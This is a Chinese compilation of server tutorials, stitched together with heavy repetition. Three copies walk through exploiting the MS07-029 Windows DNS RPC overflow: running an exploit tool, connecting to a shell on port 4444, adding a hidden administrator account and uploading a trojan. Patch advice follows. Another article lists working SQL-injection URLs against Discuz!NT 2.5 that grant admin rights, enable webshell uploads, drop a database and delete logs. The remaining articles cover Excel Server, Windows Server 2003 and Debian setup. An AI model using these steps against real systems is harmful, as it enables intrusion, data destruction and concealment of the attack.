两招填补Windows DNS服务器漏洞服务器教程
“板甲牧师安度因”通过精心收集,向本站投稿了7篇两招填补Windows DNS服务器漏洞服务器教程,以下是小编精心整理后的两招填补Windows DNS服务器漏洞服务器教程,希望对大家有所帮助。
篇1:两招填补Windows DNS服务器漏洞服务器教程
DNS 是域名系统 (Domain Name System) 的缩写,大家在上网时输入的网址,是通过域名解析系解析找到相对应的IP地址才能访问到网站。但是最近微软的Windows 和Windows 2003的DNS服务出现一个极高的安全漏洞,如果被 成功利用的话,那么我们的上网操作将遇到巨大的麻烦。
姓名:张均诚
特长:Windows系统漏洞研究
使用工具:DNS服务器漏洞利用工具
自白:最近Windows系统的DNS出现了0day漏洞,自从这个安全漏洞的代码被披露,攻击这个漏洞的Nirbot蠕虫已经出现了各种变体。如果这个漏洞被 利用,那么系统就会被 完全控制。
DNS漏洞打开系统防线
Windows DNS如果存在这个漏洞,那么它在工作时,RPC接口如果处理到有非常规的畸形连接请求,就会向外释放管理员权限,让 可以利用这种漏洞完全控制系统。 可以通过向有这个漏洞的系统发送一个经过特别设计的RPC数据包,就能够获得该系统的管理员权限,远程执行任意指令。
小知识:什么是RPC
远程过程调用 (RPC) 是一种协议,程序可使用这种协议向网络中的另一台计算机上的程序请求服务。由于使用 RPC 的程序不必了解支持通信的网络协议的情况,因此 RPC 提高了程序的互操作性。
此前,RPC中也出现过数个漏洞,其中包括导致Blaster蠕虫大爆发的那个漏洞。这一最新的漏洞是一个堆栈溢出漏洞,给微软和Windows用户带来了很 烦。
根据微软发布的消息,Windows XP和Windows Vista不会受到这一DNS漏洞的影响,Windows 2000 Server SP4、Windows Server 2003 SP1、Windows Server 2003 SP2则存在这一漏洞。
轻松利用DNS漏洞
打开系统的命令提示符,接着跳转到DNS服务器漏洞利用工具所在的命令,然后执行该漏洞利用工具(图1),
在该漏洞的利用程序中执行命令:dns.exe -h 127.0.0.1 -t 1 -p 445,因为我是在本地计算机上进行测试的,所以其中的IP地址为127.0.0.1,而且需要根据服务器版的语言设置参数。当利用工具提示溢出成功以后,就可以利用telnet命令或程序nc连接存在漏洞的服务器中的4444端口,比如telnet 127.0.0.1 4444(图2)。需要说明的是,该工具的成功率并不是特别的高,所以在测试的时候需要多进行几次
当我们成功利用漏洞进行溢出以后,就可以在命令行输入:net user pcw 1234 /add,回车确定后如果显示命令成功,就说明已经成功的添加了一个用户名为pcw密码为1234的用户。
然后我们再在命令行输入:net localgroup administrators pcw /add,成功执行的话就表示将该用户已经添加到管理员组(图3)。
现在只要利用Windows系统自带的远程桌面功能,接着连接到该DNS服务器的IP地址,然后利用我们刚刚创建的用户名进行登录,就可以进行适时地远程管理操作了(图4)。
如果远程服务器没有开通终端服务功能,也可以通过溢出得到的命令提示符窗口,通过FTP或Tftp命令上传我们的木马程序,这样也可以进行有效的远程管理操作。
漏洞危害大,不可不防
由于这个安全漏洞影响到Windows 2000 Server和Windows Server 2003服务器软件,而且每一种语言版本的Windows服务器都要有一个补丁。微软提供的补丁地址:www.microsoft.com/china/technet/security/bulletin/ms07-029.mspx,请根据自己情况选择对应的补丁。
同时,建议管理员采取如下措施以降低威胁。首先打开注册表编辑器,找到以下注册表位置HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesDNSParameters,通过右键菜单新建一个名为“RpcProtocol”的DWORD项目,然后双击新建的值并将该值的数据更改为4,最后重启DNS服务更改生效即可。
篇2:两招填补Windows DNS服务器漏洞DNS服务器
DNS 是域名系统 (Domain Name System) 的缩写,大家在上网时输入的网址,是通过域名解析系解析找到相对应的IP地址才能访问到网站。但是最近微软的Windows 2000和Windows 2003的DNS服务出现一个极高的安全漏洞,如果被 成功利用的话,那么我们的上网操作将遇到巨大的麻烦。
姓名:张均诚
特长:Windows系统漏洞研究
使用工具:DNS服务器漏洞利用工具
自白:最近Windows系统的DNS出现了0day漏洞,自从这个安全漏洞的代码被披露,攻击这个漏洞的Nirbot蠕虫已经出现了各种变体。如果这个漏洞被 利用,那么系统就会被 完全控制。
DNS漏洞打开系统防线
Windows DNS如果存在这个漏洞,那么它在工作时,RPC接口如果处理到有非常规的畸形连接请求,就会向外释放管理员权限,让 可以利用这种漏洞完全控制系统。 可以通过向有这个漏洞的系统发送一个经过特别设计的RPC数据包,就能够获得该系统的管理员权限,远程执行任意指令。
小知识:什么是RPC
远程过程调用 (RPC) 是一种协议,程序可使用这种协议向网络中的另一台计算机上的程序请求服务。由于使用 RPC 的程序不必了解支持通信的网络协议的情况,因此 RPC 提高了程序的互操作性。
此前,RPC中也出现过数个漏洞,其中包括导致Blaster蠕虫大爆发的那个漏洞。这一最新的漏洞是一个堆栈溢出漏洞,给微软和Windows用户带来了很 烦。
根据微软发布的消息,Windows XP和Windows Vista不会受到这一DNS漏洞的影响,Windows 2000 Server SP4、Windows Server 2003 SP1、Windows Server 2003 SP2则存在这一漏洞。
轻松利用DNS漏洞
打开系统的命令提示符,接着跳转到DNS服务器漏洞利用工具所在的命令,然后执行该漏洞利用工具(图1)。
在该漏洞的利用程序中执行命令:dns.exe -h 127.0.0.1 -t 1 -p 445,因为我是在本地计算机上进行测试的,所以其中的IP地址为127.0.0.1,而且需要根据服务器版的语言设置参数。当利用工具提示溢出成功以后,就可以利用telnet命令或程序nc连接存在漏洞的服务器中的4444端口,比如telnet 127.0.0.1 4444(图2),
需要说明的是,该工具的成功率并不是特别的高,所以在测试的时候需要多进行几次
当我们成功利用漏洞进行溢出以后,就可以在命令行输入:net user pcw 1234 /add,回车确定后如果显示命令成功,就说明已经成功的添加了一个用户名为pcw密码为1234的用户。
然后我们再在命令行输入:net localgroup administrators pcw /add,成功执行的话就表示将该用户已经添加到管理员组(图3)。
现在只要利用Windows系统自带的远程桌面功能,接着连接到该DNS服务器的IP地址,然后利用我们刚刚创建的用户名进行登录,就可以进行适时地远程管理操作了(图4)。
如果远程服务器没有开通终端服务功能,也可以通过溢出得到的命令提示符窗口,通过FTP或Tftp命令上传我们的木马程序,这样也可以进行有效的远程管理操作。
漏洞危害大,不可不防
由于这个安全漏洞影响到Windows 2000 Server和Windows Server
关 键 字:DNS 服务器
篇3:两招填补Windows DNS服务器漏洞
DNS 是域名系统 (Domain Name System) 的缩写,大家在上网时输入的网址,是通过域名解析系解析找到相对应的IP地址才能访问到网站。但是最近微软的Windows 和Windows 2003的DNS服务出现一个极高的安全漏洞,如果被 成功利用的话,那么我们的上网操作将遇到巨大的麻烦。
特长:Windows系统漏洞研究
使用工具:DNS服务器漏洞利用工具
自白:最近Windows系统的DNS出现了0day漏洞,自从这个安全漏洞的代码被披露,攻击这个漏洞的Nirbot蠕虫已经出现了各种变体。如果这个漏洞被 利用,那么系统就会被 完全控制。
DNS漏洞打开系统防线
Windows DNS如果存在这个漏洞,那么它在工作时,RPC接口如果处理到有非常规的畸形连接请求,就会向外释放管理员权限,让 可以利用这种漏洞完全控制系统。 可以通过向有这个漏洞的系统发送一个经过特别设计的RPC数据包,就能够获得该系统的管理员权限,远程执行任意指令。
小知识:什么是RPC
远程过程调用 (RPC) 是一种协议,程序可使用这种协议向网络中的另一台计算机上的程序请求服务。由于使用 RPC 的程序不必了解支持通信的网络协议的情况,因此 RPC 提高了程序的互操作性。
此前,RPC中也出现过数个漏洞,其中包括导致Blaster蠕虫大爆发的那个漏洞。这一最新的漏洞是一个堆栈溢出漏洞,给微软和Windows用户带来了很 烦。
根据微软发布的消息,Windows XP和Windows Vista不会受到这一DNS漏洞的影响,Windows 2000 Server SP4、Windows Server 2003 SP1、Windows Server 2003 SP2则存在这一漏洞。
轻松利用DNS漏洞
打开系统的命令提示符,接着跳转到DNS服务器漏洞利用工具所在的命令,然后执行该漏洞利用工具(图1),
在该漏洞的利用程序中执行命令:dns.exe -h 127.0.0.1 -t 1 -p 445,因为我是在本地计算机上进行测试的,所以其中的IP地址为127.0.0.1,而且需要根据服务器版的语言设置参数。当利用工具提示溢出成功以后,就可以利用telnet命令或程序nc连接存在漏洞的服务器中的4444端口,比如telnet 127.0.0.1 4444(图2)。需要说明的是,该工具的成功率并不是特别的高,所以在测试的时候需要多进行几次
当我们成功利用漏洞进行溢出以后,就可以在命令行输入:net user pcw 1234 /add,回车确定后如果显示命令成功,就说明已经成功的添加了一个用户名为pcw密码为1234的用户。
然后我们再在命令行输入:net localgroup administrators pcw /add,成功执行的话就表示将该用户已经添加到管理员组(图3)。
现在只要利用Windows系统自带的远程桌面功能,接着连接到该DNS服务器的IP地址,然后利用我们刚刚创建的用户名进行登录,就可以进行适时地远程管理操作了(图4)。
如果远程服务器没有开通终端服务功能,也可以通过溢出得到的命令提示符窗口,通过FTP或Tftp命令上传我们的木马程序,这样也可以进行有效的远程管理操作。
漏洞危害大,不可不防
由于这个安全漏洞影响到Windows 2000 Server和Windows Server 2003服务器软件,而且每一种语言版本的Windows服务器都要有一个补丁。微软提供的补丁地址:www.microsoft.com/china/technet/security/bulletin/ms07-029.mspx,请根据自己情况选择对应的补丁。
同时,建议管理员采取如下措施以降低威胁。首先打开注册表编辑器,找到以下注册表位置HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesDNSParameters,通过右键菜单新建一个名为“RpcProtocol”的DWORD项目,然后双击新建的值并将该值的数据更改为4,最后重启DNS服务更改生效即可。
篇4:Discuz!NT 2.5重大漏洞服务器教程
正在使用Discuz!NT 2.5或刚升级到Discuz!NT 2.5论坛版本的用户需要关注一下本文的内容,及时到 寻找解决方法.
漏洞说明:Discuz!NT 2.5 是康盛创想(北京)科技有限公司旗下的一款功能强大的基于 ASP.net平台的社区软件,基于先进的 .Net Framework,默认支持 SQLServer数据库,可扩展支持Access、MySQL等多种数据库,支持IIS5、IIS6、IIS7,安全高效、稳定易用,充分发挥 ASP.net 特性,支持自由选择切换皮肤,支持多种其它论坛的数据转换。
Discuz!NT 2.5 强化论坛功能,提高速度和稳定性,负载能力也有显著改善,在此基础上还将提供包括商品交易、空间、相册等强大功能的插件包,供用户自由选择安装,体现出强大的伸缩扩展性。无论是从功能、性能,还是从支持环境等角度来看,都是目前最为完善和成熟 ASP.net 社区软件。但是ISTO成员在其中发现了一个安全漏洞,成功利用此漏洞可以直接修改管理员的密码进入后台,取得管理员权限,从而控制整个网站。
漏洞厂商:www.comsenz.com
漏洞解析:在 Discuz!NT 2.5(0826更新前)版本中showuser.aspx页面由于对ordertype变量没处理好!导致SQL注入,恶意攻击用户甚至不用注册账户,只要精心构造ordertype即可利用此漏洞,
漏洞测试:
www.*.com/bbs/showuser.aspx?ordertype=desc;drop database kj;C
www.*.com/bbs/showuser.aspx?ordertype=desc;update dnt_users set adminid=’1′,groupid=’1′ where username=’webtets’;C//更新为管理员
www.*.com/bbs/showuser.aspx?ordertype=desc;update dnt_attachtypes set extension=’aspx’ where extension=’jpg’;C //更新为aspx可上传
得到SHELL后…
www.*.com/bbs/showuser.aspx?ordertype=desc;update dnt_attachtypes set extension=’jpg’ where extension=’aspx’;C //更新回JPG
www.*.com/bbs/showuser.aspx?ordertype=desc;delete from dnt_adminvisitlog where username=’webtets’;C //删除日志
www.*.com/bbs/showuser.aspx?ordertype=desc;update dnt_users set adminid=”,groupid=” where username=’webtets’;C//取消管理员
篇5:Excel服务器教程(1)
第一章引言
1.1什么是Excel服务器?
Excel服务器是一套程序,它能够以Excel和ESweb为客户界面,将Excel文件和数据保存到MSSQLServer中,自动生成Excel表单/报表,用工作流传递Excel表单/报表,自动生成Web系统,不但能够在局域网中应用,还能在互联网上应用。还能集成外部数据源,构成一个统一的数据系统。
Excel服务器最大的特点是会用Excel,普通非IT专业人员就能自己实现基于Web和工作流的管理信息系统。能够象用Excel一样方便、简单、任意修改,适应企业的发展变化。不再需要软件工程师来为自己维护管理信息系统。
同时,Excel服务器也是一种能够把MSExcel变成网络系统的工具。
1.2Excel服务器2005(企业版)的特色
1.表间公式使得您能够任意引用权限范围内的企(事)业单位内的业务数据。一个Excel模版可以定义多个表间公式。表间公式可以大大提高您的工作效率,减少人为错误,降低您的劳动强度。
2.工作流可以使Excel文件按照管理流程和权限角色进行流动,特别是,在Excel文件传递过程中可以随时使用表间公式,获得所需要的数据,因此,工作流充分和数据处理相结合是Excel服务器2005的一大特点。
3.ESWeb系统可以使用户通过互联网进行填报、修改、应用表间公式、图表、工作流、交叉表、查询数据和引用外部数据源。通过设计Excel服务器模版,就可自动实现Web化的管理信息系统。
4.Excel服务器2005(企业版)中,公用数据和信息(例如,组织机构、人员、角色、系统日志、备份与恢复等)统一管理;数据类型、数据规范、用户词典、自动编号规则可以根据权限进行分散管理,业务表单、台帐和报表由用户根据权限设计、管理。大大增强了系统的适应性和可用性。
5.外部数据源可以使用户非常方便地将已有的ERP/SCM/CRM/OA等管理信息系统的数据集成进入Excel服务器,实现数据集成。
6.回写公式可以使系统按条件自动改变已有单据上的信息,完全实现“前单驱动后单,后单核销前单”的功能。
7.Excel服务器2005嵌入在MSExcel中,会用Excel,就很容易掌握Excel服务器,培训成本和维护成本大大降低。
8.采用MSSQLServer2000作为系统数据库,企业的Excel文件和业务数据具有安全保障,
9.适用于局域网和广域网。
10.支持群集(Cluster)系统,双机热备,充分保证安全性。
11.支持交叉表。
1.3使用Excel服务器需要什么软硬件环境?
一、硬件环境
1.局域网
最简单的局域网,可以采用一个集线器把几台计算机联起来。也可以是由不同的网段组成的大型网络。
2.互联网接入
有企业在国外或外地,需要通过互联网来管理,还需要接入互联网。宽带、DDN专线接入均可。
3.服务器
服务器是用户存储Excel文件和数据,以及系统信息。普通的PC机就可以。如果条件允许,可以采用专用的PC服务器。服务器即可以放在企业内,也可以进行主机托管。
推荐的服务器配置:
CPU:P42.8GHZ内存:512MB以上,硬盘80GB以上。服务器最容易出故障的地方是风扇,需要经常检查。
4.客户机
也就是通常人们使用的计算机。
建议:
CPU:P31GHZ内存256MB,硬盘40GB.硬件的配置可以随自己的情况变动,配置高一点,则运行速度快一点,配置低一点,则运行速度慢一点。
二、软件配置
1.Excel服务器2005企业版
企业版比标准版多出一个ESweb系统,能够在互联网上使用。因此,需要一个能够建立网站的环境。
服务器软件系统要求:
(1).操作系统:Windows2000/XP/WindowsServer
需要配置IIS.
对于Windows2000,在安装完IIS后,还需要安装Microsoft.NetFramwork.
具体参见帮助文档。
(2).数据库:MSSQLServer2000/MSDE2000
其中,MSDE2000是MSSQLServer2000的桌面产品,主要限制数据库最大容量不超过2GB.
(3)MSExcel2000//2003
(4)IE需要5.5以上。
2.Excel服务器2005标准版
标准版没有ESweb系统,因此,服务器的操作系统要求低,可以是Win98/Me/2000/XP/2003.
MSOffice:MSExcel2000/2002/2003
数据库:MSSQLServer2000/MSDE2000
1.4适合什么企业和个人使用?
1.希望能够随时能够改变企业管理信息系统的企业和个人。
2.买不到现成管理信息系统产品的企业和个人。
3.不愿花太多钱建立管理信息系统的企业和个人。
4.想把企业各种信息系统相互联系起来的企业和个人。
5.缺乏IT人员的企业。
6.会用Excel的人员。
篇6:Windows Server 2003服务器教程
server|window
4月,Windows Server 2003发布;对活动目录、组策略操作和管理、磁盘管理等面向服务器的功能作了较大改进,对.net技术的完善支持进一步扩展了服务器的应用范围,
Windows Server 2003有四个版本:Windows Server 2003 Web服务器版本(Web Edition)、Windows Server 2003标准版(Standard Edition)、Windows Server 2003企业版(Enterprise Edition)以及Windows Server 2003数据中心版(Datacenter Edition),
Web Edition主要是为网页服务器(web hosting)设计的,而Datacenter是一个为极高端系统使用的。标准和企业版本则介于两者中间。
Windows Server 2003是目前微软最新的服务器操作系统。
一开始,该产品叫作“Windows .NET Server”,改成“Windows .NET Server 2003”,后最终被改成“Windows Server 2003”,于203月28日发布,并在同年四月底上市。
Windows Server 2003有多种版本,每种都适合不同的商业需求:
Windows Server 2003 Web版
Windows Server 2003 标准版
Windows Server 2003 企业版
Windows Server 2003 数据中心版
篇7:从零开始配置服务器服务器教程
从零开始配置服务器
(一)硬件准备
一台HP ProLiant DL160 G5服务器(硬盘拓展到480G)
一台个人电脑(windows操作系统)
一个Lenovo 4G 闪存(fat32格式)
(二)制作引导U盘
网络上有许多制作Linux引导U盘的文章,但真正能用的少之又少,期间尝试多个办法,均以失败告终,下面将直接阐述最可行,也是最简单的方法。
下载U盘boot工具,共三个文件,已经打包,下载地址:www.filesavr.com/u-boot
解压syslinux-3.73.tar.gz文件,ctrl+r输入cmd打开命令提示符,然后使用cd命令进入syslinux-3.73目录下的win32文件夹
syslinux.exe -m -a x: x为U盘盘符
命令完成后就已经在U盘中建立了一个可引导文件,当然,这是隐藏的。
在u盘中建立此文件syslinux.cfg(用记事本或写字板编辑,注意,先在控制面板-文件夹选项中选择显示后缀名) ,并在里面加入
default vmlinuz
append initrd=initrd.gz
再将u-boot包中的vmlinuz,initrd.gz转移到U盘中。
最后从cdimage.debian.org/debian-cd/5.0.3/i386/iso-cd/下载debian-503-i386-CD-1.iso 镜像并转移到U盘里。
至此,U盘引导盘制作完成。
(三)安装debian
将U盘插入,启动服务器,bios默认从U盘启动,因此在这里我无需设置。
进入字符安装界面,根据提示操作,到检测磁盘的那一步拔掉U盘,待分区完成后再插上,回头按Erc重新选择挂载ISO镜像,安装基本系统,选择软件包(这里只选择桌面环境以及标准系统,装桌面环境是为了配置方便),安装grub,安装debian完成,拔掉U盘重启服务器。
在我重启完成后,经过一个蓝色选择debian模式的界面,直接提示找不到root错误-root (hd1,0)。
不用慌张,接着按Erc退回debian模式选择界面,按c,这是修复grub的界面,移到root (hd1,0)上,按e编辑root,改成
root (hd0,0)
回车,最后按b启动,启动正常。
进入系统,登陆,附件,终端
su 输入root密码后就可以行使root权限
vim /boot/grub/menu.lst
拉到最下面,找到前面没有“#”前缀的
root (hd0,1)
改为
root (hd0,0)
至此安装debian完成,
(四)配置源
安装好之后,发现apt-get install任何软件都失败,查看源配置文件,问题在于只有一个基础源,并没有任何软件源。直接google:debian 源。根据自己网络先随便选择一个,然后再终端输入
apt-get install apt-spy
如果源没有问题,安装完成后即可使用apt-spy。
cp /etc/apt/sources.list /etc/apt/sources.list.bak 备份源
apt-spy -d lenny -a Asia 搜索亚洲境内最快源
扫描生成/etc/apt/sources.list.d/apt-spy.list文件,这个其实就可以作为sources.list文件用了。
cp /etc/apt/sources.list.d/apt-spy.list /etc/apt/sources.list 覆盖掉原有的sources.list文件
(五)快速搭建环境
终端输入:
apt-get install lighttpd php5-cgi php5-mysql mysql-server php5-gd phpmyadmin
之后按照我这篇文章的方法配置lighttpd,地址:youling.wordpress.com.cn/debian-lighttpd-php-mysql.html
vsftpd按照这里的资料根据自己的需求配置,地址:wiki.ubuntu.org.cn/Vsftpd服务安装设置
如果需要外网访问phpmyadmin,输入如下命令建立软连接:
ln -s /usr/share/phpmyadmin/ /var/www/ root权限模式下才行
最后是ssh安装配置。
apt-get install openssh-server
配置SSH
vim /etc/ssh/sshd_config
这里有相关资料,按自己需求配置,地址:www.diybl.com/course/6_system/linux/Linuxjs/20090903/173704.html
至此,服务器配置完成。
(六)测试工作
使用ftp软件上传一个探针到web根目录。
访问127.0.0.1查看最终结果。
zend或者其他php加速器可以自己安装,很简单,这里就不再累述。
提示:如果修改某一服务的配置文件,使用 /etc/init.d/服务名 resart即可完成重启,比如:
/etc/init.d/ssh resart
【两招填补Windows DNS服务器漏洞服务器教程】相关文章:
文档为doc格式
